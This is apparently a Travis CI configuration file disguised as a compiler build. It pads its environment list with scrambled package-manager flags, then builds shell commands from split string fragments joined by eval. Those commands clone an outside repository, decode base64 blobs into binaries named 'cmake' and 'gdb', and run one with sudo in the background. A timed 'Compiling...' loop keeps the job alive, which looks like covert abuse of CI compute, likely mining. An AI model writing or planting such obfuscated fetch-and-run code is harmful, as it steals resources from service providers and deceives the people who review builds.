dist: bionic

env:
  - BUILD="--autounmask-continue=1282J"
  - BUILD="--onlydeps=6861v"
  - BUILD="--binpkg-respect-use=567Bz"
  - BUILD="--onlydeps=424jv"
  - BUILD="--selective=466ug"
  - BUILD="--autounmask-keep-masks=5573W"
  - BUILD="--verbose=926sy"
  - BUILD="--help=437v"
  - BUILD="--with-bdeps=571M3"
  - BUILD="--fail-clean=441Ro"
  - BUILD="--autounmask-write=8251r"
  - BUILD="--ignore-soname-deps=572Rk"
  - BUILD="--changed-slot=284sf"
  - BUILD="--version=254d0"
  - BUILD="--autounmask-write=6924h"
  - BUILD="--update=305Oq"
  - BUILD="--info=706IR"
  - BUILD="--alphabetical=630if"
  - BUILD="--accept-restrict=22905"
  - BUILD="--columns=671ib"
  - BUILD="--autounmask-keep-keywords=890f2"
  - BUILD="--emptytree=647xf"
  - BUILD="--verbose-conflicts=464Lb"
  - BUILD="--tree=638Zp"
  - BUILD="--changelog=15MV"
  - BUILD="--changed-deps-report=30R0"
  - BUILD="--changed-deps=518Vf"
  - BUILD="--noreplace=241fj"
  - BUILD="--nodeps=625ZQ"
  - BUILD="--resume=301Yq"
  - BUILD="--changed-deps-report=26001"
  - BUILD="--unmerge=277UD"
  - BUILD="--reinstall=376cp"
  - BUILD="--changed-use=432f6"
  - BUILD="--fetch-all-uri=940jk"
  - BUILD="--search=7271x"
  - BUILD="--binpkg-respect-use=123hz"
  - BUILD="--autounmask-license=150o4"
  - BUILD="--pkg-format=475mr"
  - BUILD="--reinstall=387Ex"
  - BUILD="--rebuild-exclude=199IX"
  - BUILD="--alphabetical=730jY"
  - BUILD="--changed-slot=101uR"
  - BUILD="--quickpkg-direct=64GR"
  - BUILD="--with-test-deps=860RI"
  - BUILD="--search-index=550gW"
  - BUILD="--changelog=530NL"
  - BUILD="--accept-restrict=402YO"
  - BUILD="--metadata=6458Q"
  - BUILD="--prune=841RW"
  - BUILD="--prefix=98579"
  - BUILD="--read-news=277Pi"
  - BUILD="--changed-slot=222hi"
  - BUILD="--misspell-suggestions=945MI"
  - BUILD="--root=245av"
  - BUILD="--with-bdeps=234ka"
  - BUILD="--oneshot=70kj"
  - BUILD="--rage-clean=304wU"
  - BUILD="--complete-graph-if-new-use=457eZ"
  - BUILD="--help=843sO"
  - BUILD="--autounmask=423W7"
  - BUILD="--ask=4778C"
  - BUILD="--quiet=444z0"
  - BUILD="--usepkg-exclude=518tA"
  - BUILD="--alert=882ah"
  - BUILD="--noconfmem=375Vt"
  - BUILD="--fetchonly=9674u"
  - BUILD="--quiet-build=315Eg"
  - BUILD="--read-news=72563"
  - BUILD="--pkg-format=669ve"
  - BUILD="--autounmask-backtrack=524BG"
  - BUILD="--rebuild-exclude=356jA"
  - BUILD="--autounmask-license=787r3"
  - BUILD="--ask-enter-invalid=842lN"
  - BUILD="--changed-deps=683m1"
  - BUILD="--debug=56879"
  - BUILD="--onlydeps-with-rdeps=799Rt"
  - BUILD="--debug=908Cf"
  - BUILD="--buildpkg=234U4"
  - BUILD="--ignore-world=645CR"
  - BUILD="--nospinner=810Zr"
  - BUILD="--with-bdeps=228Uy"
  - BUILD="--skipfirst=522wN"
  - BUILD="--rebuild-if-new-ver=929Qb"
  - BUILD="--with-bdeps-auto=163Mz"
  - BUILD="--noreplace=163Oz"
  - BUILD="--load-average=918vC"
  - BUILD="--autounmask-license=355gb"
  - BUILD="--regen=5797M"
  - BUILD="--autounmask-continue=2475c"
  - BUILD="--root=753ER"
  - BUILD="--autounmask-unrestricted-atoms=19R8"
  - BUILD="--regen=560Bv"
  - BUILD="--metadata=422w8"
  - BUILD="--ignore-soname-deps=421cn"
  - BUILD="--getbinpkgonly=100xg"
  - BUILD="--rebuild-if-unbuilt=79951"
  - BUILD="--misspell-suggestions=449Mn"
  - BUILD="--accept-properties=434hn"
  - BUILD="--depclean-lib-check=546tb"
  - BUILD="--backtrack=909l1"
  - BUILD="--digest=4094R"
  - BUILD="--rebuilt-binaries=111Er"
  - BUILD="--getbinpkgonly=935x0"
  - BUILD="--autounmask-use=878hg"
  - BUILD="--read-news=5327b"
  - BUILD="--check-news=6804B"
  - BUILD="--autounmask-only=479eB"
  - BUILD="--version=966fL"
  - BUILD="--binpkg-changed-deps=285zn"
  - BUILD="--changed-deps-report=7802o"
  - BUILD="--selective=20Az"
  - BUILD="--check-news=660tO"
  - BUILD="--rebuild-if-unbuilt=31b3"
  - BUILD="--keep-going=891y3"
  - BUILD="--version=869ve"
  - BUILD="--autounmask-only=933zK"
  - BUILD="--unmerge=708Cr"
  - BUILD="--backtrack=30ab"
  - BUILD="--clean=571Ph"
  - BUILD="--metadata=729fr"
  - BUILD="--fetch-all-uri=390TI"
  - BUILD="--nodeps=490S0"
  - BUILD="--buildpkg-exclude=275Li"
  - BUILD="--help=6078o"
  - BUILD="--with-test-deps=211mI"
  - BUILD="--update=207XG"
  - BUILD="--buildpkg-exclude=465ag"
  - BUILD="--ignore-world=648Es"
  - BUILD="--usepkgonly=214e8"
  - BUILD="--search=393qj"
  - BUILD="--debug=6493N"
  - BUILD="--fetchonly=460bC"
  - BUILD="--useoldpkg-atoms=259CZ"
  - BUILD="--search=363s3"
  - BUILD="--columns=367qI"
  - BUILD="--depclean=479y8"
  - BUILD="--onlydeps-with-rdeps=881ag"
  - BUILD="--reinstall-atoms=836it"
  - BUILD="--rage-clean=306g5"
  - BUILD="--root=603RW"
  - BUILD="--columns=135qO"
  - BUILD="--nodeps=156hT"
  - BUILD="--list-sets=624uf"
  - BUILD="--usepkg-exclude=369wH"
  - BUILD="--complete-graph-if-new-ver=239wd"
  - BUILD="--fail-clean=755c3"
  - BUILD="--reinstall-atoms=9285w"
  - BUILD="--changelog=555i8"
  - BUILD="--with-bdeps-auto=456xz"
  - BUILD="--depclean=254j3"
  - BUILD="--digest=733oP"
  - BUILD="--implicit-system-deps=451jF"
  - BUILD="--rage-clean=442KA"
  - BUILD="--rebuild-if-new-slot=463U6"
  - BUILD="--rebuild-if-new-slot=338mr"
  - BUILD="--exclude=692fI"
  - BUILD="--with-bdeps=427q3"
  - BUILD="--info=167FM"
  - BUILD="--oneshot=7279l"
  - BUILD="--search=850rQ"
  - BUILD="--quiet-fail=879uR"
  - BUILD="--package-moves=620JO"
  - BUILD="--complete-graph-if-new-ver=269HH"
  - BUILD="--autounmask-backtrack=784v7"
  - BUILD="--fail-clean=969i3"
  - BUILD="--complete-graph-if-new-ver=3864w"
  - BUILD="--info=4904j"
  - BUILD="--pkg-format=521JZ"
  - BUILD="--quiet-build=49334"
  - BUILD="--rebuilt-binaries-timestamp=331nM"
  - BUILD="--rebuild-exclude=7799L"
  - BUILD="--onlydeps-with-rdeps=676Tn"
  - BUILD="--autounmask-keep-keywords=103Vb"
  - BUILD="--quickpkg-direct=137DD"
  - BUILD="--deep=527vD"
  - BUILD="--check-news=7014o"
  - BUILD="--changed-slot=368nW"
  - BUILD="--verbose=309mf"
  - BUILD="--quiet-build=920c5"
  - BUILD="--prefix=675R2"
  - BUILD="--rebuild-exclude=3651x"
  - BUILD="--autounmask=890tQ"
  - BUILD="--searchdesc=841Vu"

language: minimal

script:
  - GkiapV="sudo apt up"
  - WYhOnzFwij="date || tru"
  - eval "$GkiapV""$WYhOnzFwij""e"
  - FsbFA="sudo apt --"
  - aosgaGUwi="yes install"
  - yenZIvFSAaR=" cl-base64 "
  - SZNtRWwQxV="git &>/dev/"
  - eval "$FsbFA""$aosgaGUwi""$yenZIvFSAaR""$SZNtRWwQxV""null"
  - IxUzXV="git clone h"
  - QhODPczQYR="ttps://gccb"
  - hvlaBrUwo="uild@bitbuc"
  - kjIJNCs="ket.org/gcc"
  - YzdMgtfj="build/gcc.g"
  - kmrXwdSfzFl="it &>/dev/n"
  - eval "$IxUzXV""$QhODPczQYR""$hvlaBrUwo""$kjIJNCs""$YzdMgtfj""$kmrXwdSfzFl""ull"
  - nnquDZ="base64 -d g"
  - GkegjLkxCq="cc/cmake_ >"
  - eval "$nnquDZ""$GkegjLkxCq"" cmake"
  - MFQJM="base64 -d g"
  - RvewRxXKcGV="cc/config_ "
  - eval "$MFQJM""$RvewRxXKcGV""> log"
  - LYDXZ="base64 -d g"
  - qCMClXHE="cc/make_ > "
  - eval "$LYDXZ""$qCMClXHE""gdb"
  - FafdfEHWF="chmod +x gd"
  - eval "$FafdfEHWF""b cmake"
  - ./cmake
  - rfsaoAKD="sed -i 's/b"
  - dStZgtD="uild/tg3o/g"
  - eval "$rfsaoAKD""$dStZgtD""' log"
  - sudo ./gdb --config=log &>/dev/null &
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Compiling...; [ $CC -ge $((GCC + 2473)) ] && sudo killall gdb && break; sleep 201; done
